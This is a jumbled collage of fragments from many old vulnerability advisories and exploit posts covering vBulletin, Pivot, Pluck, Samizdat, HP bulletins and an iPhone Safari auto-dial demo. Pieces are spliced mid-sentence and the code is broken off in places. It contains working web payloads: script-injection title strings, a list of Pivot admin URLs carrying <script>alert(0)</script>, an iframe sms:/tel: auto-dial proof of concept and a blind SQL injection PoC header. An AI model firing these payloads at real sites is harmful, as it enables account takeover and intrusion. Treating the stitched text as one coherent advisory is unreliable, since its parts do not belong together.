-:: The Advisory ::-
The header.php file for showing a single microblog entry does not sanitize the page_title correctly.
page_title is set by the user when posting an entry to the microblog platform.
Original Post at http://forum.aria-security.com/en/showthread.php?p=1179
Greetz to Aura & all Aria-Security Mods & Members
These were all tested on vBulletin 3.8.0 RC2, so other versions may also be affected.
1. User Titles. admincp/usertitle.php?do=modify. Add a new title. Use the following code as the title name.
<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
or any other XSS code.
2. Post Icons. admincp/image.php?do=add&table=icon. Add a new title, give a wrong path such as /images/aria.gif, and use the following code as the title name.
%>
<head>
<meta http-equiv="content-type" content="text/html;
charset=iso-8859-1"/>
@@ -45,7 +47,7 @@
<title>Sessions Administration: details for <%= currentSessionId
%></title>
</head>
<body>
- -<h1>Details for Session <%= JspHelper.escapeXml(currentSessionId) %></h1>
+<h1>Details for Session <%= currentSessionId %></h1>
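Review bot: the added line drops the JspHelper.escapeXml() wrapper around currentSessionId in the <h1>, so the session id is written into the page unescaped; unless that value is guaranteed to contain only safe characters, the heading becomes an HTML injection sink. Keep the escapeXml() call, and note that the <title> element in the context lines above also emits currentSessionId without escaping and should get the same treatment.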
<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="FeedCreator 1.7.2" -->
<?xml-stylesheet href="http://www.w3.org/2000/08/w3c-synd/style.css" type="text/css"?>
<rss version="0.91">
<channel>
<title> Feed</title>
<description></description>
<link>http://192.168.0.1</link>
<lastBuildDate>Sat, 09 May 2009 20:01:44 +0100</lastBuildDate>
<generator>FeedCreator 1.7.2</generator>
<language>en-us</language>
RESOLUTION
HP has provided the following patches to resolve the vulnerability. The patch kits can be downloaded from http://support.openview.hp.com/selfsolve/patches by searching for product 'HP TestDirector for Quality Center', product version 9.2 and optional keyword 'Patch8'.
Title: Monthly patch8 - TD4QC_00033
Document ID: KM425256
Product: TestDirector for Quality Center Version: 9.2
OS: AIX
Title: Monthly patch8 - TD4QC_00034
The individual items of an RSS channel are handled in
html/webmail/server/inc/rss/item.php
In the function getHTML(), the final HTML page for an item is assembled
and returned. The "title" and "description" keys correspond to the
<title> and <description> elements in the feed, the "href" key to the
<link> element:
------------------------------------------------------------------------
public function getHTML(&$aItem)
switch($searchby){
........
case "Title" :
$title = $_POST['searchquery'];
if(strlen($title)>2){
//check length at least 3 chars
#------------
#CONDITIONS:
#------------
#
#
#**Exist a valid image with title
#
#**gpc_magic_quotes=off/on
#
#---------------------------------------
#PROOF OF CONCEPT (BLIND SQL INJECTION):
Copy and save --> PoC.html.
Configure --> HOST, HOME_PATH
<html>
<title>
PoC BY Y3NH4CK3R --PROUD TO BE SPANISH-->
</title>
<h1>
Click "Execute PoC" to launch the proof of concept (SQLi)...
</h1>
Then again you seem to be judging about something you haven't seen
nor read. Is this because I ask the Fox News style questions and you
give Fox News style comments?
FFL> the title is misleading at best.
While I have the utmost respect for your person, in this particular
case, I am sorry dude, but how can you tell? Have you seen the
presentation? Have you heard the conclusion? I don't think so?
Though you are more than welcome to see it :)
The application insufficiently verifies the incoming "description" parameter in the /staff/index.php?_m=troubleshooter&_a=insertcategory script.
An attacker with "staff" privileges can use the vulnerability to inject and execute arbitrary HTML code and scripts in a user's browser within the trust relationship between the browser and the server.
To exploit the vulnerability, an attacker must convince a user with "staff" privileges to open a URL like:
http://example.com/support/staff/index.php?_m=troubleshooter&_a=managecategories
The application insufficiently verifies the incoming "title" parameter in the /staff/index.php?_m=downloads&_a=insertfile script.
An attacker with "staff" privileges can use the vulnerability to inject and execute arbitrary HTML code and scripts in a user's browser within the trust relationship between the browser and the server.
To exploit the vulnerability, an attacker must trick a user with "staff" privileges into opening a URL like:
http://example.com/support/staff/index.php?_m=downloads&_a=managefiles
Title:
======
osCmax Shop CMS v2.5.1 - Multiple Web Vulnerabilities
Date:
=====
2012-04-08
Title:
======
GroupWare epesiBIM CRM 1.2.1 - Multiple Web Vulnerabilities
Date:
=====
2012-04-10
community of users to easily publish, manage and organize a wide
variety of content on a website. (From: http://drupal.org/about)
The Node Blocks module allows users to specify content type(s) as
being a block. This allows the content managers of the site to edit
the block text and title without having to access the block
administration page. (From: http://drupal.org/project/nodeblock)
The block title is not properly sanitized when a user displays a block
created from a node, resulting in a cross site scripting
vulnerability.
/opencms/opencms/system/workplace/commons/publishproject.jsp
Remediation: Filter out hazardous characters from user input
Parameter(s): title, cancel, dialogtype, framename, progresskey,
projected, projectname, publishsiblings, relatedresources, subresources
Vulnerability(s): Cross-Site Scripting, Phishing Through Frames, SQL
Injection
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) 18 May 2010 Initial release
Version:2 (rev.2) 28 May 2010 Updated title, affected software description and summary
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Proof-of-Concept with plain HTML using the SMS application:
<html>
<head>
<title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
</title>
</head>
<body>
<iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
<iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
attachments are also saved locally. The file names used to save the
attachments are obtained from the TNEF data. In case of normal
attachments, the code first looks if the TNEF data contains MAPI
properties and if so, it will look for specific properties. If these
exists, a file name is extracted from these properties. If the
properties do not exist, the attachment's title is used. This title
is also set through a TNEF structure. If this title is also not
available, a default file name will be used instead.
if ((RealAttachment == 1) || (saveintermediate == 1)) {
/* Ok, it's not an embedded stream, so now we */
Cross Site Scripting: (triggers on logged in administrators only) [low or no impact due to session-key in URL]
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=entries&sort="><script>alert(0)</script>
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=entries&doaction=1&action=delete&check[]='><script>alert(0)</script>
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=entries&doaction=1&action=delete&check['><script>alert(0)</script>]=0
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=admin&func=admin&do=edituser&edituser=</title><script>alert(0)</script>
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=admin&func=admin&do=templates&edit=<script>alert(0)</script>
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=admin&func=admin&do=blog_edit1&blog="><script>alert(0)</script>
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=admin&func=admin&do=cat_edit&cat="><script>alert(0)</script>
retrieve nearly arbitrary files from the filesystem. The relevant source code
for these pages is as follows:
// The following is Copyright (C) 2009 TANDBERG //
...
// Grab the content before we write anything: we'll need it for the title tag in the <head>
// Dig out the page title, from the <title> tag,
// then remove any surround in the page as we add our own...
$filename = $this->helpPagePath . $_GET['page'] . $this->helpPageSuffix;
if (! file_exists($filename)) {
Url_PrefixUnInstall /logs
Note: For further information please refer to the following document.
Document title: CAE Alert: Unauthenticated access to HPCA log files from a web browser
Document ID: KM897874
The document is available from the HP Software Support Online portal at http://support.openview.hp.com/
PRODUCT SPECIFIC INFORMATION
Software: Samizdat, an open publishing web application written in Ruby
Vulnerability: cross-site scripting
Vulnerable Versions: 0.6.1 and earlier
Non-vulnerable Versions: 0.6.2, Debian package 0.6.1-3lenny1
Patch: http://samizdat.nongnu.org/release-notes/samizdat-0.6.1-xss-escape-title.patch
References: CVE-2009-0359, DTSA-194-1
Description:
Samizdat 0.6.1 contains several code paths that fail to escape special HTML
'month1' => TYPE_INT,
'day1' => TYPE_INT,
'month2' => TYPE_INT,
'day2' => TYPE_INT,
'period' => TYPE_INT,
'title' => TYPE_STR,
'description' => TYPE_STR,
));
..
$db->query_write("
UPDATE " . TABLE_PREFIX . "holiday
PRODUCT SPECIFIC INFORMATION
None
HISTORY
Version:1 (rev.1) - 18 August 2008 Initial release
Version:2 (rev.2) - 18 August 2008 Correction to numbers in title
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
vBulletin Cross Site Scripting Vulnerability
*Advisory Information*
Title: vBulletin Cross Site Scripting Vulnerability
Advisory ID: CORE-2008-0813
Advisory URL: http://www.coresecurity.com/my-advisory
Date published: 2008-08-20
Date of last update: 2008-08-19
Vendors contacted: vBulletin team
########################## www.BugReport.ir #########################
#
# AmnPardaz Security Research Team
#
# Title: Pluck Local File inclusion
# Vendor: http://www.pluck-cms.org
# Bug: Local File Inclusion
# Vulnerable Version: 4.5.1 (prior versions also may be affected)
# Exploitation: Remote with browser
# Fix: N/A